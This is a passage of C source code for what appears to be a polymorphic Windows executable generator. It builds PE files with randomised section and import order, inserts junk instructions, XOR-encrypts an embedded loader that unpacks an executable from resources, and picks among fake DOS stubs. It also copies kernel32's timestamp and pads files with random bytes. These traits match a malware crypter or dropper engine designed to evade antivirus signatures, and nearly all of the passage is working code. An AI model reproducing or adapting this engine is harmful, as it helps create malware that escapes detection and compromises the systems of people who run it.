      i += (Rc->IdataSectionSz + 4095) & ~ 4095;
      Rc->SectionOrder = (Rc->SectionOrder << 4) + SECTION_IMPORT;
      Rc->NumberOfSections++;
#     ifdef TEST
        wsprintf( DbgMsg, "virtual address of idata section %08X\r\n", Rc->IdataSectionVA );
        DbgOut();
#     endif
    }

    // calculate resource data size (b)
    b = 0;
    for( a = 0; a < Rc->RsrcTypeCount; a++ )
      for( j = 0; j < Rc->RsrcCount[ a ]; j++ )
        b += (Rc->RsrcSize[ a ][ j ] + 3) & ~3;

    if( Rand() & 1 ) a = 0x10; else a = 0x01;
    for( j = 0; j < 2; j++ ) {
      if( a & 0xF ) {
        Rc->RelocSectionVA = i;
        i += (Rc->RelocSectionSz + 4095) & ~ 4095;
        Rc->SectionOrder = (Rc->SectionOrder << 4) + SECTION_RELOC;
        Rc->NumberOfSections++;
#       ifdef TEST
          wsprintf( DbgMsg, "virtual address of reloc section %08X\r\n", Rc->RelocSectionVA );
          DbgOut();
#       endif
      }
      else {
        Rc->RsrcSectionVA = i;
        i += (Rc->RsrcSectionSz + b + 4095) & ~ 4095;
        Rc->SectionOrder = (Rc->SectionOrder << 4) + SECTION_RESOURCE;
        Rc->NumberOfSections++;
#       ifdef TEST
          wsprintf( DbgMsg, "virtual address of rsrc section %08X\r\n", Rc->RsrcSectionVA );
          DbgOut();
#       endif
      }
      a >>= 4;
    }
#   ifdef TEST
      wsprintf( DbgMsg, "size of image %08X\r\n", i );
      DbgOut();
#   endif
    Rc->SizeOfImage = i;
    a = Rc->SectionOrder;
    Rc->SectionOrder = 0;
    for( i = 1; i < Rc->NumberOfSections; i++ ) {
      Rc->SectionOrder = (Rc->SectionOrder << 4) + (a & 0xF);
      a >>= 4;
    }


    // define module order and other related params

    RndFill( Rc->ModuleOrder, MODULE_COUNT, MODULE_COUNT );
    Rc->ModuleCount = 0;
    for( i = 0; i < MODULE_COUNT; i++ ) {
      switch( Rc->ModuleOrder[ i ] ) {
        case MODULE_KERNEL:
          Rc->ModuleName[ i ] = "KERNEL32.dll";
          Rc->ModuleImp[ i ] = Rc->KernelImpIdx;
          Rc->ModuleImpCount[ i ] = Rc->KernelImpCount;
          Rc->ModuleFunc[ i ] = Kernel32Func;
          break;
        case MODULE_USER:
          Rc->ModuleName[ i ] = "USER32.dll";
          Rc->ModuleImp[ i ] = Rc->UserImpIdx;
          Rc->ModuleImpCount[ i ] = Rc->UserImpCount;
          Rc->ModuleFunc[ i ] = User32Func;
          break;
        case MODULE_GDI:
          Rc->ModuleName[ i ] = "GDI32.dll";
          Rc->ModuleImp[ i ] = Rc->GdiImpIdx;
          Rc->ModuleImpCount[ i ] = Rc->GdiImpCount;
          Rc->ModuleFunc[ i ] = Gdi32Func;
          break;
        case MODULE_ADVAPI:
          Rc->ModuleName[ i ] = "ADVAPI32.dll";
          Rc->ModuleImp[ i ] = Rc->AdvapiImpIdx;
          Rc->ModuleImpCount[ i ] = Rc->AdvapiImpCount;
          Rc->ModuleFunc[ i ] = Advapi32Func;
          break;
        case MODULE_WINSOCK:
          Rc->ModuleName[ i ] = "WSOCK32.dll";
          Rc->ModuleImp[ i ] = Rc->WinsockImpNames;
          Rc->ModuleImpCount[ i ] = Rc->WinsockImpCount;
          Rc->ModuleFunc[ i ] = NULL;
          break;
      }
      if( Rc->ModuleImpCount[ i ] != 0 ) Rc->ModuleCount++;
    }
#   ifdef TEST
      wsprintf( DbgMsg, "order" );
      for( i = 0; i < MODULE_COUNT; i++ )
        wsprintf( DbgMsg + lstrlen( DbgMsg ), "  %s (%d)", 
                  Rc->ModuleName[ i ], Rc->ModuleImpCount[ i ] );
      wsprintf( DbgMsg + lstrlen( DbgMsg ), "\r\n" );
      DbgOut();
#   endif

    return Rc;
  }


/*
  returns index of instruction that doesn't violate modification requirements
*/
static int GetInstructionIndex( INSTRUCTION* ITable, int ICount, BYTE ModFlag )
  {
    int  i, j;

    // first, try to cast 8 times
    for( j = 0; j < 8; j++ ) {
      i = Rand() % ICount;
      if( (ITable[ i ].ModFlag & ModFlag) == 0 ) return i;
    }

    // finally, scan
    j = i & 1;
    while( (ITable[ i ].ModFlag & ModFlag) != 0 ) {
      if( j ) {
        if( ++i == ICount ) i = 0;
      }
      else {
        if( --i < 0 ) i = ICount - 1;
      }
    }
    return i;
  }


static void InitRelocationAdd( EXEDEF* ExeDef )
  {
    ExeDef->RelocLastVA = 0; // to begin new relocation block
    ExeDef->RelocBufIdx = 0;
  }


static void EndUpRelocationBlock( EXEDEF* ExeDef )
  {
    if( ExeDef->RelocBufIdx & 3 ) { // pad block to DWORD
      *((WORD*)(ExeDef->RelocBuf + ExeDef->RelocBufIdx)) = 0;
      ExeDef->RelocBufIdx += 2;
    }
    // set block size
    *((DWORD*)(ExeDef->RelocBuf + ExeDef->RelocBlockStart + 4)) =
          ExeDef->RelocBufIdx - ExeDef->RelocBlockStart;
    // set virtual address
    *((DWORD*)(ExeDef->RelocBuf + ExeDef->RelocBlockStart)) =
          ExeDef->RelocLastVA;
#   ifdef TEST
      wsprintf( DbgMsg, "relocations: VA %08X - end, size %08X\r\n",
                ExeDef->RelocLastVA, ExeDef->RelocBufIdx - ExeDef->RelocBlockStart );
      DbgOut();
#   endif
  }


/*
  adds relocation element to reloc section
*/
static void AddRelocation( DWORD Address, EXEDEF* ExeDef )
  {
    DWORD  Offset;

    Offset = Address & 4095;
    Address &= ~4095;

    if( Address != ExeDef->RelocLastVA ) {

      if( ExeDef->RelocBufIdx != 0 ) EndUpRelocationBlock( ExeDef );

      // begin new block

#     ifdef TEST
        wsprintf( DbgMsg, "relocations: VA %08X (%08X) - begin at %08X\r\n",
                  Address, Offset, ExeDef->RelocBufIdx );
        DbgOut();
#     endif
      ExeDef->RelocLastVA = Address;
      ExeDef->RelocBlockStart = ExeDef->RelocBufIdx;
      ExeDef->RelocBufIdx += 8;
    }

    *((WORD*)(ExeDef->RelocBuf
              + ExeDef->RelocBufIdx)) = (WORD)(0x3000 + Offset);
    ExeDef->RelocBufIdx += 2;
  }


/*
  Generates dummy instructions
*/
static DWORD GenerateDummyBlock( DWORD Ip, DWORD Count,
                                 BYTE ModFlag, LOADERDATA* Ld,
                                 EXEDEF* ExeDef, DWORD* iuse, DWORD* i2use )
  {
    DWORD  i, vaddr;
    BYTE   j;

    while( Count-- ) {

      // determine table according to RELOC_NUM / RELOC_DENOM ratio

      if( *i2use < *iuse * RELOC_NUM / RELOC_DENOM ) {

        // use itable2

        i = GetInstructionIndex( Ld->ITable2, Ld->ICount2, ModFlag );
        for( j = 0; j < Ld->ITable[ i ].Sz; j++ )
          ExeDef->CodeBuf[ Ip++ ] = Ld->ITable[ i ].Instr[ j ];

        // set random address
        vaddr = 0;
        // try rdata
        if( ExeDef->RdataSectionSz != 0 )
          if( Rand() & 1 )
            vaddr = ExeDef->RdataSectionVA
                               + Rand() % (ExeDef->RdataSectionSz - 4);
        // try bss
        if( vaddr == 0 && ExeDef->BssSectionSz != 0 )
          if( Rand() & 1 )
            vaddr = ExeDef->BssSectionVA
                               + Rand() % (ExeDef->BssSectionSz - 4);
        // finally, use data
        if( vaddr == 0 )
          if( Rand() & 1 )
            vaddr = ExeDef->DataSectionVA
                               + Rand() % (ExeDef->DataSectionSz - 4);
        *((DWORD*) (ExeDef->CodeBuf[ Ip ])) = vaddr;

        AddRelocation( Ip + ExeDef->CodeSectionVA, ExeDef );
        Ip += 4;
      }
      else {

        // use itable

        i = GetInstructionIndex( Ld->ITable, Ld->ICount, ModFlag );
        for( j = 0; j < Ld->ITable[ i ].Sz; j++ )
          ExeDef->CodeBuf[ Ip++ ] = Ld->ITable[ i ].Instr[ j ];
      }
    }
    return Ip;
  }


/*
  returns total imports of modules before specified one
*/
static DWORD GetTotalImportsBefore( char* Module, EXEDEF* ExeDef )
  {
    DWORD  c, i;

    c = 0;
    for( i = 0; i < MODULE_COUNT; i++ ) {
      if( lstrcmpi( ExeDef->ModuleName[ i ], Module ) == 0 ) break;
      c += ExeDef->ModuleImpCount[ i ];
    }
    return c;
  }


/*
  returns function index in import table for specified module
*/
static DWORD GetFunctionIndex( char* Function, char* Module, EXEDEF* ExeDef )
  {
    DWORD  f, i;

    for( i = 0; i < MODULE_COUNT; i++ )
      if( lstrcmpi( ExeDef->ModuleName[ i ], Module ) == 0 ) break;

    for( f = 0; f < ExeDef->ModuleImpCount[ i ]; f++ )
      if( lstrcmpi( Function,
             ExeDef->ModuleFunc[ i ][ ExeDef->ModuleImp[ i ][ f ] ] ) == 0 )
        break;
    return f;
  }


static void GenerateLoaderCode( EXEDEF* ExeDef, LOADERDATA* Ld )
  {
    DWORD  Ip, iuse, i2use, i, k, x;
    ULONG  n;
    BYTE   ModFlag, j;

    // init instruction pointer and generate first dummy block

#   ifdef TEST
      wsprintf( DbgMsg, "generating 1st block (%d instructions)\r\n", ExeDef->DummyCount[0] );
      DbgOut();
#   endif
    InitRelocationAdd( ExeDef );
    iuse = i2use = 0;
    Ip = GenerateDummyBlock( 0, ExeDef->DummyCount[0],
                             0, Ld, ExeDef, &iuse, &i2use );
    ExeDef->EntryPoint = Ip;
#   ifdef TEST
      wsprintf( DbgMsg, "entry point %08X\r\n", Ip );
      DbgOut();
#   endif


    // generate prologue

    for( i = 0; i < Ld->PCount; i++ ) {
#     ifdef TEST
        wsprintf( DbgMsg, "generating block %d (%d instructions)\r\n", i + 1, ExeDef->DummyCount[ i + 1 ] );
        DbgOut();
#     endif
      if( i == 0 ) ModFlag = 0; else ModFlag = Ld->Prologue[i-1].Instr.ModFlag;
      Ip = GenerateDummyBlock( Ip, ExeDef->DummyCount[ i + 1 ],
                               ModFlag, Ld, ExeDef, &iuse, &i2use );
      Ld->Prologue[i].IP = Ip;
#     ifdef TEST
        wsprintf( DbgMsg, "prologue instruction %d is placed at %08X\r\n", i, Ip );
        DbgOut();
#     endif
      for( j = 0; j < Ld->Prologue[i].Instr.Sz; j++ )
        ExeDef->CodeBuf[ Ip++ ] = Ld->Prologue[ i ].Instr.Instr[ j ];

      if( Ld->Prologue[i].Type == I2T_CBEGIN ) {
#       ifdef TEST
          wsprintf( DbgMsg, "  must be relocated\r\n" );
          DbgOut();
#       endif
        AddRelocation( Ld->Prologue[ i ].IP
                       + Ld->Prologue[ i ].Value + ExeDef->CodeSectionVA,
                       ExeDef );
      }
    }


    // now Ip is offset of Code_Begin;
    // we can now calculate offset of jump table

    ExeDef->JumpTableOffset = (Ip + Ld->LSize + 3) & ~3;


    // tune prologue

#   ifdef TEST
      wsprintf( DbgMsg, "tuning prologue\r\n" );
      DbgOut();
#   endif

    for( i = 0; i < Ld->PCount; i++ ) {

      switch( Ld->Prologue[i].Type ) {

        case I2T_JUMPDEST:
          // calculate relative offset
          *((DWORD*)(ExeDef->CodeBuf + Ld->Prologue[ i ].IP + 2)) =
                 Ld->Prologue[ Ld->Prologue[ i ].Value ].IP
                 - (Ld->Prologue[ i ].IP + Ld->Prologue[ i ].Instr.Sz);
#         ifdef TEST
            wsprintf( DbgMsg, "instruction %d, jump destination to %d is resolved\r\n", i, Ld->Prologue[ i ].Value );
            DbgOut();
#         endif
          break;

        case I2T_CALLDEST:
          // determine index (k) in jump table
          k = GetTotalImportsBefore( Ld->PImps[
                                        Ld->Prologue[ i ].Value ].Module,
                                     ExeDef );
          k += GetFunctionIndex( Ld->PImps[
                                    Ld->Prologue[ i ].Value ].Function,
                                 Ld->PImps[
                                    Ld->Prologue[ i ].Value ].Module,
                                 ExeDef );
          // now we can determine offset of jump instruction
          k = k * 6 + ExeDef->JumpTableOffset;
          // and calculate relative offset
          *((DWORD*)(ExeDef->CodeBuf + Ld->Prologue[ i ].IP + 1)) =
                 k - (Ld->Prologue[ i ].IP + Ld->Prologue[ i ].Instr.Sz);
#         ifdef TEST
            wsprintf( DbgMsg, "instruction %d, call destination is resolved\r\n", i );
            DbgOut();
#         endif
          break;

        case I2T_CBEGIN:
          *((DWORD*)(ExeDef->CodeBuf + Ld->Prologue[ i ].IP
                                       + Ld->Prologue[ i ].Value)) =
                        Ip + ExeDef->CodeSectionVA + IMAGE_BASE;
#         ifdef TEST
            wsprintf( DbgMsg, "instruction %d, cb offset is set\r\n", i );
            DbgOut();
#         endif
          break;

        case I2T_XOR:
          *((DWORD*)(ExeDef->CodeBuf + Ld->Prologue[ i ].IP + 2)) =
                             ExeDef->XorValues[ Ld->Prologue[ i ].Value - 1 ];
#         ifdef TEST
            wsprintf( DbgMsg, "instruction %d, xor value %c is set\r\n", i, 'a' + Ld->Prologue[i].Value - 1 );
            DbgOut();
#         endif
          break;
      }
    }


    // copy loader code and tune loader's jump table

#   ifdef TEST
      wsprintf( DbgMsg, "lcode begins at %08X\r\n", Ip );
      DbgOut();
#   endif

    RtlMoveMemory( ExeDef->CodeBuf + Ip, Ld->LCode, Ld->LSize );

    i = 9; // offset of loader's jump table
    while( Ld->LCode[ i ] != 0 ) {
      n = lstrlen( Ld->LCode + i + 6 ) + 1;
      // determine index (j) in jump table
      k = GetTotalImportsBefore( (char*)(Ld->LCode + i + 6 + n), ExeDef );
      k += GetFunctionIndex( (char*)(Ld->LCode + i + 6),
                             (char*)(Ld->LCode + i + 6 + n), ExeDef );
      // now we can determine offset of jump instruction
      k = k * 6 + ExeDef->JumpTableOffset;
      // and calculate relative offset
      *((DWORD*)(ExeDef->CodeBuf + Ip + i + 2)) = k - (Ip + i + 6);
      i += 6 + n + lstrlen( Ld->LCode + i + 6 + n ) + 1;
    }

    // place resource type, id and xor values into loader code

#   ifdef TEST
      wsprintf( DbgMsg, "tune lcode\r\n" );
      DbgOut();
#   endif
    i++;
    *((DWORD*)(ExeDef->CodeBuf + Ip + i)) = ExeDef->ExeResType;
    i += 4;
    *((DWORD*)(ExeDef->CodeBuf + Ip + i)) = ExeDef->ExeResId;
    for( j = 0; j < 4; j++ ) {
      i += 4;
      *((DWORD*)(ExeDef->CodeBuf + Ip + i)) = ExeDef->XorValues[ j ];
    }

    // encrypt loader code
#   ifdef TEST
      wsprintf( DbgMsg, "encrypt lcode\r\n" );
      DbgOut();
#   endif
    Crypt( ExeDef->CodeBuf + Ip, Ld->LSize,
           ExeDef->XorValues[0], ExeDef->XorValues[1],
           ExeDef->XorValues[2], ExeDef->XorValues[3] );
    Ip += Ld->LSize;


    // generate jump table

#   ifdef TEST
      wsprintf( DbgMsg, "jmp %08X lcode end %08X\r\n", ExeDef->JumpTableOffset, Ip + Ld->LSize );
      DbgOut();
#   endif

    for( i = Ip - 1; i < ExeDef->JumpTableOffset; i++ )
      ExeDef->CodeBuf[ i ] = 0; // clear space between lcode and jump table
                                // including unencrypted last loader's byte
    // i now is offset of jump table

    n = (ExeDef->ModuleCount + 1) * 20;  // import module directory size
    if( ExeDef->SplitNameAddr ) // if tables are splitted, add name table size
      for( j = 0; j < MODULE_COUNT; j++ )
        if( ExeDef->ModuleImpCount[ j ] != 0 )
          n += (ExeDef->ModuleImpCount[ j ] + 1) * sizeof(DWORD);
    x = 0; // function counter
    for( j = 0; j < MODULE_COUNT; j++ )
      if( ExeDef->ModuleImpCount[ j ] != 0 ) {
        for( k = 0; k < ExeDef->ModuleImpCount[ j ]; k++ ) {
#         ifdef TEST
            if( ExeDef->ModuleOrder[ j ] == MODULE_WINSOCK )
              wsprintf( DbgMsg, "jmp at %08X to %s:%08X\r\n",
                        i, ExeDef->ModuleName[ j ], ExeDef->ModuleImp[ j ][ k ] );
            else
              wsprintf( DbgMsg, "jmp at %08X to %s:%s\r\n",
                        i, ExeDef->ModuleName[ j ], ExeDef->ModuleFunc[ j ][ ExeDef->ModuleImp[ j ][ k ] ] );
            DbgOut();
#         endif
          ExeDef->CodeBuf[ i++ ] = 0xFF;
          ExeDef->CodeBuf[ i++ ] = 0x25;
          if( ExeDef->SplitNameAddr ) {
            *((DWORD*)(ExeDef->CodeBuf + i)) = ExeDef->IdataSectionVA + n
                  + (x * sizeof(DWORD)) // previous names/addresses
                  + k * sizeof(DWORD)
                  + IMAGE_BASE;
          }
          else {
            *((DWORD*)(ExeDef->CodeBuf + i)) = ExeDef->IdataSectionVA + n
                  + (x * 2 * sizeof(DWORD)) // previous names/addresses
                  + (ExeDef->ModuleImpCount[ j ] + 1) * sizeof(DWORD) // names
                  + k * sizeof(DWORD)
                  + IMAGE_BASE;
          }
          AddRelocation( ExeDef->CodeSectionVA + i, ExeDef );
          i += 4;
        }
        x += ExeDef->ModuleImpCount[ j ] + 1;
      }

#   ifdef TEST
      wsprintf( DbgMsg, "loader code: %d (%08X) bytes\r\n", i, i );
      DbgOut();
#   endif

    ExeDef->CodeSectionSz = i;
  }


static BYTE StubA[] = { 0x4D, 0x5A, 0x78, 0x00, 0x01, 0x00, 0x00, 0x00,
                        0x04, 0x00, 0x21, 0x00, 0xFF, 0xFF, 0x04, 0x00,
                        0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x78, 0x00, 0x00, 0x00,
                        0x0E, 0x1F, 0xB4, 0x09, 0xBA, 0x0E, 0x00, 0xCD,
                        0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68,
                        0x69, 0x73, 0x20, 0x70, 0x72, 0x6F, 0x67, 0x72,
                        0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F,
                        0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E,
                        0x20, 0x69, 0x6E, 0x20, 0x44, 0x4F, 0x53, 0x20,
                        0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0A, 0x24 };

static BYTE StubB[] = { 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00,
                        0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
                        0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,
                        0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD,
                        0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68,
                        0x69, 0x73, 0x20, 0x70, 0x72, 0x6F, 0x67, 0x72,
                        0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F,
                        0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E,
                        0x20, 0x69, 0x6E, 0x20, 0x44, 0x4F, 0x53, 0x20,
                        0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0D, 0x0A,
                        0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

static BYTE StubC[] = { 0x4D, 0x5A, 0x80, 0x01, 0xD2, 0x01, 0x00, 0x00,
                        0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
                        0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,
                        0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD,
                        0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68,
                        0x69, 0x73, 0x20, 0x70, 0x72, 0x6F, 0x67, 0x72,
                        0x61, 0x6D, 0x20, 0x72, 0x65, 0x71, 0x75, 0x69,
                        0x72, 0x65, 0x73, 0x20, 0x4D, 0x69, 0x63, 0x72,
                        0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x57, 0x69,
                        0x6E, 0x64, 0x6F, 0x77, 0x73, 0x2E, 0x0D, 0x0A,
                        0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

static BYTE StubD[] = { 0x4D, 0x5A, 0x50, 0x00, 0x02, 0x00, 0x00, 0x00,
                        0x04, 0x00, 0x0F, 0x00, 0xFF, 0xFF, 0x00, 0x00,
                        0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x40, 0x00, 0x1A, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
                        0xBA, 0x10, 0x00, 0x0E, 0x1F, 0xB4, 0x09, 0xCD,
                        0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x90, 0x90,
                        0x54, 0x68, 0x69, 0x73, 0x20, 0x70, 0x72, 0x6F,
                        0x67, 0x72, 0x61, 0x6D, 0x20, 0x6D, 0x75, 0x73,
                        0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E,
                        0x20, 0x75, 0x6E, 0x64, 0x65, 0x72, 0x20, 0x57,
                        0x69, 0x6E, 0x33, 0x32, 0x0D, 0x0A, 0x24, 0x37,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

#define STUBASZ (sizeof(StubA)/sizeof(StubA[0]))
#define STUBBSZ (sizeof(StubB)/sizeof(StubB[0]))
#define STUBCSZ (sizeof(StubC)/sizeof(StubC[0]))
#define STUBDSZ (sizeof(StubD)/sizeof(StubD[0]))

static BYTE* Stubs[] = { StubA, StubB, StubC, StubD };
static DWORD StubSz[] = { STUBASZ, STUBBSZ, STUBCSZ, STUBDSZ };

#define STUB_COUNT (sizeof(Stubs)/sizeof(Stubs[0]))


static BOOL FileRead( HANDLE Fh, void* Buf, DWORD Len )
  {
    DWORD  j;

    if( ! ReadFile( Fh, Buf, Len, &j, NULL ) ) {
#     ifdef TEST
        wsprintf( DbgMsg, "cannot read %d bytes from file, error %d (%08X)\r\n",
                  Len, GetLastError(), GetLastError() );
        DbgOut();
#     endif
      return FALSE;
    }
    if( j != Len ) {
#     ifdef TEST
        wsprintf( DbgMsg, "cannot read %d bytes from file - end of file\r\n", Len );
        DbgOut();
#     endif
      return FALSE;
    }
    return TRUE;
  }


static BOOL FileWrite( HANDLE Fh, void* Buf, DWORD Len )
  {
    DWORD  j;

    if( ! WriteFile( Fh, Buf, Len, &j, NULL ) ) {
#     ifdef TEST
        wsprintf( DbgMsg, "cannot write %d bytes to file, error %d (%08X)\r\n",
                  Len, GetLastError(), GetLastError() );
        DbgOut();
#     endif
      return FALSE;
    }
    if( j != Len ) {
#     ifdef TEST
        wsprintf( DbgMsg, "cannot write %d bytes to file - disk full?\r\n", Len );
        DbgOut();
#     endif
      return FALSE;
    }
    return TRUE;
  }


static DWORD GetKernelTimeStamp( FILETIME* Tm )
  {
    HANDLE     Fh;
    DWORD      Rc;
    DWORD      Buf[3];
    char       FileName[ MAX_PATH ];
    IMAGE_DOS_HEADER FHdr;

    GetKernel32Path( FileName );
    Fh = CreateFile( FileName, GENERIC_READ, FILE_SHARE_READ,
                     NULL, OPEN_EXISTING, 0, NULL );
    if( Fh == INVALID_HANDLE_VALUE ) {
#     ifdef TEST
        wsprintf( DbgMsg, "cannot open %s\r\n", FileName );
        DbgOut();
#     endif
      return 0;
    }
    Rc = 0;
    if( ! GetFileTime( Fh, NULL, NULL, Tm ) ) {
#     ifdef TEST
        wsprintf( DbgMsg, "cannot get time of %s\r\n", FileName );
        DbgOut();
#     endif
    }
    else if( FileRead( Fh, &FHdr, sizeof(FHdr) ) ) {
      if( SetFilePointer( Fh, FHdr.e_lfanew, NULL, FILE_BEGIN ) != FHdr.e_lfanew ) {
#       ifdef TEST
          wsprintf( DbgMsg, "cannot seek to %d\r\n", FHdr.e_lfanew );
          DbgOut();
#       endif
      }
      else if( FileRead( Fh, Buf, sizeof(Buf) ) ) {
        if( Buf[0] != 0x4550 ) {
#         ifdef TEST
            wsprintf( DbgMsg, "no PE signature\r\n" );
            DbgOut();
#         endif
        }
        else Rc = Buf[2];
      }
    }
    CloseHandle( Fh );
    return Rc;
  }


static BYTE ZeroBytes[512];


static BOOL WriteAlignRandom( HANDLE Fh, DWORD Size,
                              DWORD Alignment, DWORD* Written )
  {
    BYTE    Buf[512];
    DWORD   i, j;

    // write randoms
    *Written = 0;
    while( *Written < Size ) {
      j = Size - *Written; if( j > 512 ) j = 512;
      for( i = 0; i < j; i++ ) Buf[ i ] = (BYTE) Rand();
      if( ! FileWrite( Fh, Buf, j ) ) return FALSE;
      *Written += j;
    }
    // now align
    Size = ((Size + Alignment - 1) & ~(Alignment - 1)) - Size;
    i = 0;
    while( i < Size ) {
      j = Size - i; if( j > 512 ) j = 512;
      if( ! FileWrite( Fh, ZeroBytes, j ) ) return FALSE;
      i += j;
    }
    *Written += Size;
    return TRUE;
  }


static BOOL WriteImportSection( HANDLE Fh, EXEDEF* ExeDef, DWORD* Sz )
  {
    DWORD  *dp, *nameaddr, *addraddr;
    DWORD  i, j, f, half, curr;
    BYTE   *Names;
    char   *Func;

    i = ExeDef->ModuleCount * 20 + 20;
    RtlZeroMemory( ExeDef->IdataBuf, i );
    dp = (DWORD*) (ExeDef->IdataBuf + i);
    for( half = i = 0; i < MODULE_COUNT; i++ )
      if( ExeDef->ModuleImpCount[ i ] != 0 )
        half += ExeDef->ModuleImpCount[ i ] + 1;
    curr = 0;
    Names = (BYTE*) (dp + 2 * half);

    if( ExeDef->PutModulesTogether ) {

      // put module names first

      for( i = j = 0; i < MODULE_COUNT; i++ )
        if( ExeDef->ModuleImpCount[ i ] != 0 ) {
          *((DWORD*)(ExeDef->IdataBuf + j * 20 + 12)) = // set module name va
                   (Names - ExeDef->IdataBuf) + ExeDef->IdataSectionVA;
          j++;
          lstrcpy( Names, ExeDef->ModuleName[ i ] );
          Names += lstrlen( ExeDef->ModuleName[ i ] ) + 1;
        }
    }

    for( i = j = 0; i < MODULE_COUNT; i++ )
      if( ExeDef->ModuleImpCount[ i ] != 0 ) {

        if( ! ExeDef->PutModulesTogether ) {

          // put module name

          *((DWORD*)(ExeDef->IdataBuf + j * 20 + 12)) = // set module name va
                   (Names - ExeDef->IdataBuf) + ExeDef->IdataSectionVA;
          lstrcpy( Names, ExeDef->ModuleName[ i ] );
          Names += lstrlen( ExeDef->ModuleName[ i ] ) + 1;
        }

        // put function names and set name and address va

        if( ExeDef->SplitNameAddr ) {
          nameaddr = dp + curr;
          addraddr = dp + half + curr;
        }
        else {
          nameaddr = dp + 2 * curr;
          addraddr = dp + 2 * curr + ExeDef->ModuleImpCount[ i ] + 1;
        }
        *((DWORD*)(ExeDef->IdataBuf + j * 20)) = // set function names va
                 (((BYTE*)nameaddr) - ExeDef->IdataBuf) + ExeDef->IdataSectionVA;
        *((DWORD*)(ExeDef->IdataBuf + j * 20 + 16)) = // set function address va
                 (((BYTE*)addraddr) - ExeDef->IdataBuf) + ExeDef->IdataSectionVA;
        *(nameaddr + ExeDef->ModuleImpCount[ i ]) = 0;
        *(addraddr + ExeDef->ModuleImpCount[ i ]) = 0;

        if( ExeDef->ModuleOrder[ i ] == MODULE_WINSOCK ) {
#         ifdef TEST
            wsprintf( DbgMsg, "names for winsock (%s)\r\n", ExeDef->ModuleName[ i ] );
            DbgOut();
#         endif
          RtlMoveMemory( nameaddr, ExeDef->ModuleImp[ i ],
                         ExeDef->ModuleImpCount[ i ] * sizeof( DWORD ) );
